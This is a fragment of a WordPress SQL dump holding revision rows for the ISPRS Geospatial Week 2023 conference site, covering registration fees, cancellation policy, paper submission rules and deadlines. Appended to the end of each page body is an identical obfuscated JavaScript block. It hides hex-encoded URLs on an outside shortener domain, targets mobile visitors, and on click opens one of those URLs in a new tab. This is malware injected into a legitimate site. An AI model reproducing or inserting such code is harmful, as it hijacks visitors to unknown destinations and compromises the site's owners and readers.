black;\"><strong><span style=\"font-size: 14pt;\">Standard and student / senior (over 65) registration fees include:</span></strong></h5>\n<ul class=\"nospace\">\n<li><span style=\"font-size: 12pt;\"><strong>Entry to all sessions/workshops;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Entry to the Exhibition;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Copy of Final Programme;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Morning and Afternoon Tea/Coffee breaks;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Lunches;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Attendance at Welcome Reception;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Attendance at Exhibitors Reception;</strong></span></li>\n</ul>\n<h5></h5>\n<h5></h5>\n<h5></h5>\n<h5></h5>\n<h5 style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\"><strong> Accompanying person fee includes:</strong></span></h5>\n<ul>\n<li><span style=\"font-size: 12pt;\"><strong>Entry to Opening Session;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Attendance at Welcome Reception;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Attendance at Exhibitors Reception;</strong></span></li>\n<li><span style=\"font-size: 12pt;\"><strong>Morning and Afternoon Tea/Coffee breaks;</strong></span></li>\n</ul>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: red;\">Cancellation policy:</h5>\n<ul>\n<li><strong><span style=\"font-size: 12pt;\">Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than June 1st, 2023. No refunds after this date, but replacement is allowed.</span></strong></li>\n</ul>\n<h5 style=\"text-align: justify; color: red;\"><strong>-Two Social Dinners Will Be Organized On Tuesday And Thursday.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2023-02-04 06:54:45','2023-02-04 06:54:45','',2638,'https://gsw2023.com/?p=3763',0,'revision','',0),
(3764,1,'2023-02-04 07:00:42','2023-02-04 07:00:42','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5>The ISPRS Geospatial Week 2023 submission will be opened for paper submission through the ConfTool: Conference Management Software. Authors will be able to submit either a full paper or an extended abstract to one of the following workshops :</h5>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"27\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n</div>\n<h5></h5>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n<h5></h5>\n<h5></h5>\n<h5 style=\"text-align: justify; color:gray;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\n<h1><b><span style=\"font-size: 18pt;\">Important Dates:</span></b></h1>\n<h4>1. Annals (Fully Reviewed Papers):</h4>\n<ul>\n<li><span style=\"font-size: 14pt;\"><strong>Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)</strong></span></li>\n<li><span style=\"font-size: 14pt;\"><strong>Full paper Author notification: May 1, 2023</strong></span></li>\n<li><span style=\"font-size: 14pt;\"><strong>Camera ready paper submission: June 1, 2023</strong></span></li>\n</ul>\n<p>&nbsp;</p>\n<h4>2. Archives (Abstract Reviewed Papers):</h4>\n<ul>\n<li><strong><span style=\"font-size: 14pt;\">Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</span></strong></li>\n<li><strong><span style=\"font-size: 14pt;\">Abstracts Author notification: May 15, 2023</span></strong></li>\n<li><strong><span style=\"font-size: 14pt;\">Camera ready paper submission: June 1, 2023</span></strong></li>\n</ul>\n<p>&nbsp;</p>\n<h4><b>Registration deadlines</b></h4>\n<ul>\n<li class=\"m_7392195451776563107MsoListParagraphCxSpFirst\"><span style=\"font-size: 14pt;\"><strong>Early bird registration deadline: May 1, 2023</strong></span></li>\n<li class=\"m_7392195451776563107MsoListParagraphCxSpLast\"><span style=\"font-size: 14pt;\"><strong>Late registration deadline: July 1, 2023</strong></span></li>\n</ul>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<div class=\"gap-50\"></div>\n<h5 style=\"color: red;\">Useful links:</h5>\n<ul class=\"nospace\">\n<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">Guidelines for Authors</a></li>\n<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">Reviewing process for ISPRS Events</a></li>\n</ul>\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-02-04 07:00:42','2023-02-04 07:00:42','',2659,'https://gsw2023.com/?p=3764',0,'revision','',0),
